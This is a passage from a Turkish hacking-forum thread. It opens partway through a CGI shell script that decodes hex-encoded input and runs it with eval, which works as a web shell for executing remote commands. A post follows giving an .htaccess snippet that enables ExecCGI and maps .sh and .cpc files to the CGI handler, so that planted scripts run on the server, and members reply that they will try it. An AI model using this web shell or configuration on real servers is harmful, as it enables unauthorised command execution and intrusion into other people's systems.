$ECHO \"$TODO\" | $CUT \-b2 `" hex2dec C1="$PARC" PARC="`eval $ECHO \"$TODO\" | $CUT \-b3 `" hex2dec C2="$PARC" PARC="`eval $EXPR $C1 \\\* 16 \+ $C2`" dec2ascii C="$PARC" TODO=`eval $ECHO \"$TODO\" | $CUT \-b4\- ` else TODO=`eval $ECHO \"$TODO\" | $CUT \-b2\- ` fi DONE="$DONE$C" done VALUE="$DONE" eval $ECHO \"\\\$ $VALUE\" eval $VALUE fi eval $ECHO \"\<\/pre\>\<\/body\>\<\/html\>\" exit
telneti htaccess ile adını değişip
Kod:
Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .cpc
AddHandler cgi-script .sh
AddHandler cgi-script .sh-
sky
BABA
Anladim reis bunlardan biri calisirsa dile benden ne dilersen
sonuçları yaz takip edelim
-
sky
BABA
yarin deneyip bildirecemsonuçları yaz takip edelim
About Us & Legal Notice
Yasal Uyarı: spyhackerz.org, 5651 sayılı Kanun kapsamında “Yer Sağlayıcı”dır. Sitedeki içerikler, X, Instagram ve Facebook’ta olduğu gibi, ön onay olmadan tamamen kullanıcılar tarafından paylaşılır. Bu nedenle spyhackerz.org, kullanıcı içeriklerini veya hukuka aykırı paylaşımları izlemek, denetlemek ve araştırmakla yükümlü değildir. Site bünyesinde herhangi bir “saldırı ekibi” bulunmamaktadır ve Türkiye’deki internet sitelerine yönelik zararlı faaliyet yürütülmez. SPYHACKERZ, üyelerin bireysel olarak gerçekleştirdiği hacking içerikli forum faaliyetlerinden sorumlu değildir. spyhackerz.org adı kullanılarak bir saldırı yapılması halinde tüm sorumluluk yalnızca ilgili üyeye aittir.